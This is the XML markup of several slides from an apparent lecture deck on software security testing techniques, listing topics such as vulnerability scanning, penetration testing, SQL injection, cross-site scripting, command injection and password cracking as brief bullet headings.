          <p:cNvPr id="17413" name="Picture 5" descr="http://palisade.plynt.com/images/security-testing.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781300" y="3200400"/>
            <a:ext cx="3581400" cy="2686050"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="6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340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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OS Hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure and Apply Patches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Updating the Operating System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable or Restrict unwanted Services and Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lock Down the Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manage the Log Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install Root Certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect from Internet Misuse and be Cyber Safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malware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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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288356" y="1219200"/>
            <a:ext cx="1378239" cy="1190625"/>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986992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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify Known Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scan Intrusively for Unknown Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port Scanning and Service Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identification and locating of Open Ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identification of Running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Services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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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6629400" y="4648199"/>
            <a:ext cx="2172332" cy="1872343"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="60000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2"/>
            </a:outerShdw>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27442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a:xfrm>
            <a:off x="293298" y="914400"/>
            <a:ext cx="8622101" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing – Main Concepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Characteristics of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a Secure Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modeling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular Software Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cryptography</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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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740400" y="4267200"/>
            <a:ext cx="2794000" cy="201168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1407744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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simulating Attack from a Malicious Source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes Network Scanning and Vulnerability Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simulates Attack from someone Unfamiliar with the System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simulates Attack by having access to Source Code, Network, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passwords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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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352041" y="5257800"/>
            <a:ext cx="1800225" cy="1200150"/>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56042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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewall Rule Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify Inappropriate or Conflicting Rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Appropriate Placement of Vulnerable Systems behind Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovering Administrative Backdoors or Tunnels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploits Database Layer Security Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unexpected Execution of User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Inputs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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 3"/>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7162800" y="3429000"/>
            <a:ext cx="1531257" cy="1390650"/>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38633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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (5)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injecting Malicious Client Side Script into Web Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent, Non-Persistent and DOM based Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameter Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookie Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form Field Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL Manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP Header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Manipulation</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5"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324600" y="3962400"/>
            <a:ext cx="1981200" cy="2175014"/>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04140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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denial of Service Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flooding a target machine with enough traffic to make it incapable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inject and execute commands specified by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execute System level commands through a Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2742199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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (7)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifying Active Hosts on a network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collecting IP addresses that can be accessed over the Internet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collecting OS Details, System Architecture and Running Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collecting Network User and Group names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collecting Routing Tables and SNMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>data</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22053538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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (8) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collecting Passwords from the Stored or Transmitted Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Using Brute Force and Dictionary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identifying Weak Passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ethical Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Testing, Intrusion Testing and Red </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Teaming</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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619999" y="5486400"/>
            <a:ext cx="1004711" cy="898523"/>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90337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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (9)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File Integrity Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verifying File Integrity against corruption using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Checksum</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>String Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supplying Format type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>specifiers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in the Application input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="http://www.honeycomb.co.uk/images/magnify_300.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324600" y="4913086"/>
            <a:ext cx="2057400" cy="1378458"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="tx1">
                <a:alpha val="6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76581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smtClean="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>esting Techniques (10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
